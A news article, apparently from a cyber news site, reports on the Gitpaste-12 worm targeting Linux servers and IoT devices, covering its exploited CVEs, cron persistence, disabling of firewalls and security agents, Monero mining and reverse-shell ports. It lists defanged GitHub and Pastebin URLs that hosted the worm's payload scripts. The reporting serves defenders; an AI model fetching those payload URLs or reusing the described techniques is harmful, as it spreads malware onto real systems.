Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

Nasty Worm About! – Gitpaste-12 Worm Targets Linux Servers, IoT Devices!

Nasty Worm About! – Gitpaste-12 Worm Targets Linux Servers, IoT Devices!

Researchers have found a new worm targeting Linux based x86 servers, as well as Linux internet of things (IoT) devices (that are based on ARM & MIPS CPUs).

The newly discovered malware uses GitHub and Pastebin to house component code, & harbours 12 different initial attack vectors.

Note, the malware utilises GitHub & Pastebin for housing malicious component code, & has at least 12 different attack modules available – leading researchers to call it “Gitpaste-12.” It was 1st detected by Juniper Threat Labs in attacks on Oct. 15, 2020.

Lateral Spread

“No malware is good to have, but worms are particularly annoying,” commented researchers with Juniper Threat Labs in a Thur. post. “Their ability to spread in an automated fashion can lead to lateral spread within an organisation or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organisation.”

The 1st phase of the attack is the initial system compromise. The malware’s various attack modules include 11 previously-disclosed vulnerabilities. That includes flaws in Apache Struts (CVE-2017-5638), Asus routers (CVE-2013-5948), Webadmin plugin for opendreambox (CVE-2017-14135) & Tenda routers (CVE-2020-10987).

The malware will attempt to use known exploits for these flaws to compromise systems & may also attempt to ‘brute force’ passwords, observed researchers. After compromising a system, a main shell script is then uploaded to the victim machine, & starts to download & execute other components of Gitpaste-12.

The Malware

This script sets up a ‘cron job’ it downloads from Pastebin. A cron job is a time-based job scheduler in Unix-like computer operating systems. The cron job calls a script & executes it again each minute; researchers believe that this script is presumably one mechanism by which updates can be pushed to the botnet.

It then downloads a script from GitHub (https://raw[.]githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) & executes it. The script contains comments in the Chinese language & has multiple commands available to attackers to disable different security capabilities.

Defences

These include stripping the system’s defences, including firewall rules, selinux (a security architecture for LinuxR systems), apparmor (a Linux kernel security module that allows the system administrator to restrict programs’ capabilities), as well as common attack prevention & monitoring software.

The malware also has some commands that disable cloud security agents, “which clearly indicates the threat player intends to target public cloud computing infrastructure provided by Alibaba Cloud & Tencent,” observed researchers.

Gitpaste-12 also features commands allowing it to run a crypto-miner that targets the Monero cryptocurrency.

Processes

“It also prevents administrators from collecting information about running processes by intercepting ‘readdir’ system calls & skip directories for processes like tcpdump, sudo, openssl, etc. in ‘/proc’,” explained researchers. “The ‘/proc’ directory in Linux contains information about running processes.

It is used, for example, by the ‘ps’ command to show information about running processes. But unfortunately for this threat actor, this implementation does not do what they expect it to do.”

Code

Finally, the malware also contains a library (hide.so) that is loaded as LD_PRELOAD, which downloads & executes Pastebin files )https://pastebin[.]com/raw/Tg5FQHhf) that host further malicious code.

Researchers said they reported the Pastebin URL, as well as the Git repo mentioned above that downloads malicious scripts for the malware. The Git repo was closed on Oct. 30, 2020. “This should stop the proliferation of this botnet,” suggested researchers.

Wormable Features

In terms of its worming capabilities, Gitpaste-12 also contains a script that launches attacks against other machines, in an attempt to replicate & spread the malware.

“The malware chooses a random /8 CIDR for attack & will try all addresses within that range,” according to researchers. Classless Inter-Domain Routing (CIDR) is a method for allocating IP addresses & for IP routing – meaning that the attack targets all IP addresses within the random CIDR’s range.

Another version of the script also opens ports 30004 & 30005 for reverse shell commands, outlined researchers. Port 30004 uses the Transmission Control Protocol (TCP), which is one of the main protocols in TCP/IP networks; while port 30005 is a bidirectional SOAP/HTTP-based protocol, which provides communication between devices like routers or network switches, & auto-configuration servers.

Impact

Worms can have a wide impact, as seen in a 2019 campaign that exploited a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims’ Linux systems, using a wormable exploit. Researchers commmented that currently more than 3.5m servers were at risk from the attacks.

Several new worms have appeared in 2020 so far, including the Golang worm, which is aimed at installing crypto-miners, & recently changed up its tactics to add attacks on Windows servers & a new pool of exploits to its methodology.

In Aug., a cryptomining worm from the group known as TeamTNT was found spreading through the Amazon Web Services (AWS) cloud & collecting credentials. Once the logins are harvested, the malware logs in & deploys the XMRig mining tool to mine Monero cryptocurrency.

https://www.cybernewsgroup.co.uk/virtual-conference-january-2021/

 

SHARE ARTICLE